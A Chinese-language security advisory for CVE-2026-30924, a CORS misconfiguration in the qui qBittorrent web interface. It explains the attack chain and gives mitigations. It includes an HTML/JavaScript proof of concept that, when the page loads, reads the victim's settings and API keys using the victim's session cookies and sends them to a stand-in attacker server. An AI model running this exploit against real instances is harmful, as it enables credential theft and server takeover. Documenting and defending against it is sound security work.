CVE-2026-30924 CVSS 9.6 严重

CVE-2026-30924 qui CORS配置不当漏洞

披露日期: 2026-03-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30924

漏洞类型

CORS配置错误

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

qui

漏洞概述

qui是一款用于管理qBittorrent实例的Web界面。其1.14.1及以下版本存在严重的CORS配置不当漏洞。由于系统反射任意来源并设置允许凭证标志，攻击者可诱导受害者访问恶意网页，利用受害者已登录的会话发起跨域请求。这可能导致API密钥、账户凭证等敏感信息泄露，甚至通过外部程序管理器实现完全的系统接管。

技术细节

该漏洞的根源在于qui应用程序对跨域资源共享（CORS）策略的错误配置。正常情况下，CORS用于限制哪些域可以访问资源，但受影响版本直接将请求头中的Origin反射到响应头的Access-Control-Allow-Origin中，并同时启用了Access-Control-Allow-Credentials。这种组合意味着任何精心构造的恶意网站都能向受害者的qui实例发送带有身份凭证的请求。攻击者无需获取受害者的密码，只需通过社会工程学手段诱骗已登录qui的用户访问攻击者控制的网页。该网页中的JavaScript代码即可在后台静默调用qui的API接口。由于浏览器会自动携带Cookie，服务器会误认为请求来自合法用户，从而执行操作。攻击者可利用此漏洞窃取敏感配置信息（如API Key），或利用内置的“外部程序管理器”功能在服务器上执行任意命令，实现远程代码执行（RCE）。

攻击链分析

STEP 1

步骤1: 准备攻击环境

攻击者搭建一个恶意网站，并在网页中嵌入针对qui接口的JavaScript攻击脚本。

STEP 2

步骤2: 社会工程学诱导

攻击者通过钓鱼邮件或即时通讯工具，诱导已登录qui管理界面的受害者点击链接访问恶意网站。

STEP 3

步骤3: 触发跨域请求

受害者浏览器加载恶意页面，脚本自动向受害者的qui服务端发起跨域请求。由于CORS配置错误，浏览器会发送认证Cookie。

STEP 4

步骤4: 执行恶意操作

qui服务器验证通过并返回响应。攻击脚本可读取敏感数据（如API Key），或通过API调用外部程序执行系统命令。

STEP 5

步骤5: 数据回传与控制

窃取的数据被发送回攻击者的服务器，或者攻击者获得了对目标qBittorrent实例的底层系统控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept for CVE-2026-30924 -->
<!-- This script exploits the misconfigured CORS to steal data -->
<!DOCTYPE html>
<html>
<body>
<h2>CVE-2026-30924 PoC</h2>
<script>
// Replace TARGET_URL with the actual address of the victim's qui instance
const TARGET_URL = 'http://victim-qui-host:port/api/v1/settings';
const ATTACKER_LOG_URL = 'http://attacker-server/log';

function exploit() {
    console.log('Launching exploit...');
    
    fetch(TARGET_URL, {
        method: 'GET',
        credentials: 'include', // Critical: Sends cookies with the request
        headers: {
            'Content-Type': 'application/json'
        }
    })
    .then(response => response.json())
    .then(data => {
        console.log('Exfiltrated data:', data);
        // Send stolen data to attacker
        fetch(ATTACKER_LOG_URL + '?data=' + encodeURIComponent(JSON.stringify(data)));
    })
    .catch(error => {
        console.error('Exploit failed:', error);
    });
}

// Automatically trigger when the victim visits the page
window.onload = exploit;
</script>
</body>
</html>

影响范围

qui <= 1.14.1

防御指南

临时缓解措施

由于目前官方尚未提供修复补丁，建议用户暂时避免通过非localhost地址访问qui应用。如果必须进行远程管理，应通过SSH隧道或VPN连接，切勿直接暴露在公网。管理员可以在前端反向代理（如Nginx）配置中添加规则，强制删除或重置不安全的`Access-Control-Allow-Origin`和`Access-Control-Allow-Credentials`响应头，从而阻断跨域攻击链。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表